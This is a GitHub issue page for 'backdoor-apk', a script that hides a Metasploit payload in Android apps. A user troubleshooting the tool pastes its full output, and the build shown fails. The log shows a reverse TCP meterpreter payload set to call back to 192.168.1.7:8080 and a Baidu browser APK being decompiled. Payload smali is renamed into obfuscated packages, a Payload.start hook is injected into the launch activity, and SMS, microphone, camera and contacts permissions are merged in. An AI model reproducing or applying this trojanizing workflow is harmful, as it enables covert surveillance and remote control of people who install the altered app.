dana-at-cp / backdoor-apk

backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.
Apache License 2.0
2.21k stars 702 forks source link

Failed to recompile original project with backdoor #7

Closed pentester closed 8 years ago

pentester commented 8 years ago

Please help me....Thanks!

./backdoor-apk.sh browser.apk [] Generating reverse tcp meterpreter payload...done. [+] Handle the meterpreter connection at: 192.168.1.7:8080 [] Decompiling original APK file...done. [] Decompiling RAT APK file...done. [] Creating new directories in original project for RAT smali files...done. [] Copying RAT smali files to new directories in original project...done. [] Fixing RAT smali files...done. [] Locating smali file to hook in original project...done. [] Adding hook in original smali file...done. [] Merging permissions of original and payload projects...done. [] Recompiling original project with backdoor...done. [!] Failed to recompile original project with backdoor

Here is log file:

No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 9317 bytes Saved as: Rat.apk I: Using Apktool 2.1.1-77d245-SNAPSHOT on browser.apk I: Loading resource table... I: Decoding AndroidManifest.xml with resources... I: Loading resource table from file: /root/apktool/framework/1.apk I: Regular manifest package... I: Decoding file-resources... I: Decoding values / XMLs... I: Baksmaling classes.dex... I: Copying assets and libs... I: Copying unknown files... I: Copying original files... I: Using Apktool 2.1.1-77d245-SNAPSHOT on Rat.apk I: Loading resource table... I: Decoding AndroidManifest.xml with resources... I: Loading resource table from file: /root/apktool/framework/1.apk I: Regular manifest package... I: Decoding file-resources... I: Decoding values / XMLs... I: Baksmaling classes.dex... I: Copying assets and libs... I: Copying unknown files... I: Copying original files... mkdir: created directory '/root/Desktop/backdoor-apk/backdoor-apk/original/smali/net' mkdir: created directory '/root/Desktop/backdoor-apk/backdoor-apk/original/smali/net/835bb13796d65034e3eb939aa013e96f' mkdir: created directory '/root/Desktop/backdoor-apk/backdoor-apk/original/smali/net/835bb13796d65034e3eb939aa013e96f/674b001ef467e612' '/root/Desktop/backdoor-apk/backdoor-apk/payload/smali/com/metasploit/stage/Payload$1.smali' -> '/root/Desktop/backdoor-apk/backdoor-apk/original/smali/net/835bb13796d65034e3eb939aa013e96f/674b001ef467e612/Payload$1.smali' '/root/Desktop/backdoor-apk/backdoor-apk/payload/smali/com/metasploit/stage/Payload.smali' -> '/root/Desktop/backdoor-apk/backdoor-apk/original/smali/net/835bb13796d65034e3eb939aa013e96f/674b001ef467e612/Payload.smali' '/root/Desktop/backdoor-apk/backdoor-apk/payload/smali/com/metasploit/stage/PayloadTrustManager.smali' -> '/root/Desktop/backdoor-apk/backdoor-apk/original/smali/net/835bb13796d65034e3eb939aa013e96f/674b001ef467e612/PayloadTrustManager.smali' Found launcher line in manifest file: 69 Activity lines found above launcher line: 1 Value of tmp: com/baidu/browser/inter/SplashActivity The smali file to hook: /root/Desktop/backdoor-apk/backdoor-apk/original/smali/com/baidu/browser/inter/SplashActivity.smali invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V

invoke-static {p0}, Lnet/835bb13796d65034e3eb939aa013e96f/674b001ef467e612/Payload;->start(Landroid/content/Context;)V

5,6c5,6 <

<

    <uses-permission android:name="android.permission.ACCESS_COURSE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>

9,13c9,13 < < < <

<

<uses-permission android:name="android.permission.CALL_PHONE"/>
<uses-permission android:name="android.permission.CAMERA"/>
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
<uses-permission android:name="android.permission.CLEAR_APP_CACHE"/>
<uses-permission android:name="android.permission.GET_ACCOUNTS"/>

15c15,16

<

<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.KILL_BACKGROUND_PROCESSES"/>

16a18,22

<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.READ_LOGS"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.READ_SMS"/>

18,20c24,25 < <

<

<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>

22,23c27,28 <

<

<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.SET_WALLPAPER"/>

25c30,38

<

<uses-permission android:name="android.permission.VIBRATE"/>
<uses-permission android:name="android.permission.WAKE_LOCK"/>
<uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
<uses-permission android:name="android.permission.WRITE_CONTACTS"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="com.android.browser.permission.READ_HISTORY_BOOKMARKS"/>
<uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/>
<uses-permission android:name="com.android.launcher.permission.READ_SETTINGS"/>

27d39 < 28a41

I: Using Apktool 2.1.1-77d245-SNAPSHOT I: Checking whether sources has changed... I: Smaling smali folder into classes.dex... I: Checking whether resources has changed... I: Building resources... W: warning: string 'yc' has no default translation. W: warning: string 'yd' has no default translation. W: warning: string 'ye' has no default translation. W: warning: string 'yf' has no default translation. W: warning: string 'yg' has no default translation. W: warning: string 'yh' has no default translation. W: warning: string 'yi' has no default translation. W: warning: string 'yj' has no default translation. W: warning: string 'yk' has no default translation. W: warning: string 'yl' has no default translation. W: warning: string 'ym' has no default translation. W: warning: string 'yn' has no default translation. W: warning: string 'yo' has no default translation. W: warning: string 'yp' has no default translation. W: warning: string 'yq' has no default translation. W: warning: string 'yr' has no default translation. W: warning: string 'ys' has no default translation. W: warning: string 'yt' has no default translation. W: warning: string 'yu' has no default translation. W: warning: string 'yv' has no default translation. W: warning: string 'yw' has no default translation. W: warning: string 'yx' has no default translation. W: warning: string 'yy' has no default translation. W: warning: string 'yz' has no default translation. W: warning: string 'z0' has no default translation. W: warning: string 'z1' has no default translation. W: warning: string 'z2' has no default translation. W: warning: string 'z3' has no default translation. W: warning: string 'z4' has no default translation. W: warning: string 'z5' has no default translation. W: warning: string 'z6' has no default translation. W: warning: string 'z7' has no default translation. W: warning: string 'z8' has no default translation. W: warning: string 'z9' has no default translation. W: warning: string 'z_' has no default translation. W: warning: string 'za' has no default translation. W: warning: string 'zb' has no default translation. W: warning: string 'zc' has no default translation. W: warning: string 'zeus_page_can_not_zoom' has no default translation. W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/values/public.xml:274: error: invalid symbol: 'do' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/values/public.xml:452: error: invalid symbol: 'if' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/values/public.xml:1809: error: invalid symbol: 'do' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/values/public.xml:1985: error: invalid symbol: 'if' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/values/public.xml:2315: error: invalid symbol: 'do' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/values/public.xml:2653: error: invalid symbol: 'do' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/values/public.xml:2837: error: invalid symbol: 'if' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/values/public.xml:3843: error: invalid symbol: 'do' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/values/public.xml:4019: error: invalid symbol: 'if' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/a.xml:16: error: Error: No resource found that matches the given name (at 'style' with value '@style/about_text_style'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/a.xml:21: error: Error: No resource found that matches the given name (at 'style' with value '@style/about_linearlayout_style'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/a.xml:23: error: Error: No resource found that matches the given name (at 'style' with value '@style/about_text_style'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/a.xml:25: error: Error: No resource found that matches the given name (at 'style' with value '@style/about_linearlayout_style'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/a.xml:27: error: Error: No resource found that matches the given name (at 'style' with value '@style/about_text_style'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/a.xml:29: error: Error: No resource found that matches the given name (at 'style' with value '@style/about_linearlayout_style'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/a.xml:31: error: Error: No resource found that matches the given name (at 'style' with value '@style/about_text_style'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/a.xml:49: error: Error: No resource found that matches the given name (at 'style' with value '@style/about_text_style'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/a.xml:16: error: Error: No resource found that matches the given name (at 'style' with value '@style/about_text_style'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/a.xml:21: error: Error: No resource found that matches the given name (at 'style' with value '@style/about_linearlayout_style'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/a.xml:23: error: Error: No resource found that matches the given name (at 'style' with value '@style/about_text_style'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/a.xml:25: error: Error: No resource found that matches the given name (at 'style' with value '@style/about_linearlayout_style'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/a.xml:27: error: Error: No resource found that matches the given name (at 'style' with value '@style/about_text_style'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/a.xml:29: error: Error: No resource found that matches the given name (at 'style' with value '@style/about_linearlayout_style'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/a.xml:31: error: Error: No resource found that matches the given name (at 'style' with value '@style/about_text_style'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/a.xml:49: error: Error: No resource found that matches the given name (at 'style' with value '@style/about_text_style'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ad.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/redpot_card'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ad.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/redpot_card'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ae.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/card_night_theme'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ae.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/redpot_card'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ae.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/card_night_theme'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ae.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/redpot_card'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/af.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/af.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/af.xml:14: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/af.xml:15: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_more'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/af.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/af.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/af.xml:14: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/af.xml:15: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_more'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ah.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/card_night_theme'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ah.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/redpot_card'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/aj.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/aj.xml:15: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_no_content'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/aj.xml:17: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_more'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/aj.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/aj.xml:15: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_no_content'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/aj.xml:17: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_more'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/al.xml:9: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/al.xml:17: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/al.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/al.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/al.xml:20: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/al.xml:22: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/al.xml:24: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/al.xml:26: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/al.xml:29: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/al.xml:35: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_more'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/al.xml:9: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/al.xml:17: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/al.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/al.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/al.xml:20: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/al.xml:22: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/al.xml:24: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/al.xml:26: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/al.xml:29: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/al.xml:35: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_more'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/am.xml:4: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/am.xml:4: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/am.xml:4: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/am.xml:4: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/an.xml:10: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/card_content_mark_new'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/an.xml:11: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/card_night_theme'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/an.xml:10: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/card_content_mark_new'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/an.xml:11: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/card_night_theme'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ap.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/card_night_theme'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ap.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/redpot_card'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ap.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/card_night_theme'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ap.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/redpot_card'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/aq.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/redpot_card'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/aq.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/redpot_card'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ar.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ar.xml:25: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_no_content'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ar.xml:31: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ar.xml:33: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ar.xml:35: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ar.xml:37: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ar.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ar.xml:25: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_no_content'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ar.xml:31: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ar.xml:33: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ar.xml:35: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ar.xml:37: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/as.xml:45: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/as.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/as.xml:42: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_no_content'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/as.xml:45: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/as.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/as.xml:42: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_no_content'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/at.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/at.xml:34: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_no_content'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/at.xml:40: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/at.xml:42: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/at.xml:44: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/at.xml:46: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/at.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/at.xml:34: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_no_content'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/at.xml:40: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/at.xml:42: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/at.xml:44: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/at.xml:46: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/au.xml:11: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/au.xml:12: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/au.xml:21: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/au.xml:22: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/au.xml:33: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/au.xml:34: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/au.xml:43: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/au.xml:44: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/au.xml:54: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/au.xml:68: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/au.xml:71: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/au.xml:72: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/au.xml:73: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/au.xml:74: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/au.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/au.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/au.xml:57: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/au.xml:59: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/au.xml:61: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/au.xml:77: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_no_content'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/au.xml:78: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/au.xml:80: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_more'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/au.xml:11: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/au.xml:12: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/au.xml:21: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/au.xml:22: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/au.xml:33: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/au.xml:34: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/au.xml:43: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/au.xml:44: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/au.xml:54: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/au.xml:68: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/au.xml:71: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/au.xml:72: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: 